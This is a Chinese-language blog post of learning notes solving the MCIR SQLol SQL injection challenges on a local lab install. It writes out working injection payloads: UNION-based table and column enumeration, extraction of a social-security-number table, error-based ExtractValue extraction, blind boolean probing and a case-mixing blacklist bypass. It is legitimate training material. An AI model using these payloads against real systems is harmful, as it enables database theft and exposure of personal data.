MCIR下注入學習記錄

環境： xampp-win32-5.6.3-0-VC11    mcir

前言

mcir也是十大之一，可是怎麼感受沒人寫點關於它的博文等信息呢？這樣對於一個新手來學習這個系統真的頓感吃力，很難很難....我計劃是兩天學習整理資料。可是都一天過去了，我還在抓瞎，用去的時間，跟實際所作的事，感受整我的都很差了，啊，鴨梨好大！！！

最後搜到youtube上的視頻，稍微看了下，猜有些感受，視頻地址： Riding the Magical Code Injection Rainbow (MCIR) with Daniel Crowley

嚴歸
鄭賺

準備

首先在程序中更改數據庫連接密碼(若是用的是集成環境xampp，那麼將密碼設置爲空就好)，在文件

D:\xampp\htdocs\mcir\sqlol\includes\database.config.php

開始

在進入主頁後，選擇SQLol進入，看到這個

| INSERT || UPDATE || DELETE || SELECT || Custom || Challenges |

選擇Challenges，進入後會看到以下圖片：

咱們照他的挑戰等級，一個一個挑戰。

Challenge 0

這個很簡單，要求獲得全部用戶名信息：

Your objective is to get the query to return all usernames instead of just one.

提示給出是字符型，那麼直接用以下語句並獲得其結果：

固然除了 ' or '1'='1 ,咱們也能用官方視頻提供的 '=' 注入方法

Challenge 1

在挑戰一中，要求以下：

Your objective is to find the table of social security numbers present in the database and extract its information.

須要找表了，這個個人作法以下：

order by 猜到結果集的字段長度： 1
而後獲得用戶鏈接，數據庫版本。語句以下：

' and 1=2 union select concat_ws(char(32,58,32),user(),database(),version()) #

結果是： root@localhost : sqlol : 5.6.21

而後咱們猜sqlol下的表：

' and 1=2 union select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x73716C6F6C #

獲得兩張表： ssn 、 users

要咱們獲得 social security numbers ，再看着兩張表，咱們知道應該就是ssn表了，好吧，開始獲得ssn表下的全部字段

' and 1=2 union select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=0x73736E #

獲得兩個字段： name 、 ssn

而後就爆出字段下的值

' and 1=2 union select concat_ws(char(32,58,32),name , ssn ) from ssn #

獲得的信息以下圖：

　Challenge 2 - The Failure of Quote Filters

　
在挑戰二中，咋一看要求跟上面的如出一轍呢。直接把上面最後的語句複製過去。咦，報錯了，在仔細看了看挑戰的描述：

Many people sanitize or remove single quotes in their Web applications to prevent SQL injection attacks. While this can be effective against injection into string parameters, it is ineffective at preventing injection into parameters which are not quote delimited, like integers or datetime values. This places restrictions on how your injection string can be written, but does not present much of an obstacle to an attacker.

老老實實硬着頭皮看了看，發現web應用程序過濾了單引號. 故此咱們去掉單引號試試：

and 1=2 union select concat_ws(char(32,58,32),name , ssn ) from ssn #

獲得結果以下：

Challenge 3 - Death Row

對該挑戰的描述以下：

You don't always have the luxury of retrieving all rows of output from a query when performing an SQL injection attack. Sometimes, you only get one row. This challenge is similar to challenge 1, "SQL Injection 101", but only provides one row of output. To make things more challenging, this challenge configuration does not show you the query.

大概意思是要求跟挑戰一 同樣，可是獲得的結果再也不是全部行記錄，而只是一次只返回一行。

對於這樣的類型，咱們構造的語句以下：

' UNION SELECT concat(name,':',ssn) FROM ssn LIMIT 1 OFFSET 0 #
' UNION SELECT concat(name,':',ssn) FROM ssn LIMIT 1 OFFSET 1 #
...

Challenge 4 - War on Error

且看描述：

In this challenge, no output from the query is shown, but verbose errors are shown.

Your objective is to find the table of social security numbers present in the database and extract its information WITHOUT blind SQL injection techniques.

這是查詢結果不能顯示，須要構造語句到錯誤顯示處。（這裏必定是要開錯誤提示的）

構造語句以下：

' AND ExtractValue('junk',concat(0x01,(select concat(name,':',ssn) from ssn limit 1 offset 0)))='a
' AND ExtractValue('junk',concat(0x01,(select concat(name,':',ssn) from ssn limit 1 offset 1)))='a
...

Challenge 5 - Blind Luck

且看描述：

You must perform a basic Blind SQL injection attack. Only an indication of whether the query returned results is available.

這是關閉了錯誤提示，在盲注下進行注入。

對於這種注入，結果會返回boolean型，咱們在構造時，要構形成判斷型語句？？？而且必定要用or ???

' or ascii(substring((select table_name from information_schema.tables limit 1 offset 0),1,1)) >= 79 #
' or ascii(substring((select table_name from information_schema.tables limit 1 offset 0),1,1)) >= 71 #
' or ascii(substring((select table_name from information_schema.tables limit 1 offset 0),1,1)) >= 67 #

Challenge 6 - Stack the Deck

In this challenge, you must utilize stacked queries due to the difficulty of extraction in the SQLi scenario.

Your objective is to create a new table called "ipwntyourdb" using stacked queries.

挑戰六是堆疊查詢，可是php冒是不支持啊，請參見這裏描述：SQL：php+mysql支持stacked query（堆疊查詢）嗎？

並且這個挑戰好像沒實現的感受 ----

Challenge 7 - Walking on Thin Ice

In this challenge, no output from the query is shown, but verbose errors are shown.

Your objective is to find the table of social security numbers present in the database and extract its information WITHOUT deleting anything from the database.
(If you do happen to destroy the database, you can always use the SQLol reset button to bring it back to its original state.)

....有關delete的注入漏洞，目前不知道怎麼到

Challenge 8 - Black Comedy

You must perform a very basic SQL injection attack, but a primitive blacklisting filter is in place.

Your objective is to find the table of social security numbers present in the database and extract its information.

默認的黑名單過濾，可是能夠繞過，注入語句以下：

' uNion seLect concat(name,':',ssn) from ssn uNion selEct null from users whEre username='

Challenge 9 - Administrative Tasks

In this challenge, you are working with an UPDATE query. The query updates the field "username" in the "users" table for a given user.

Your objective is to inject into the query and cause it to update the "isadmin" field to 1 for the user with id 3.

未實現-----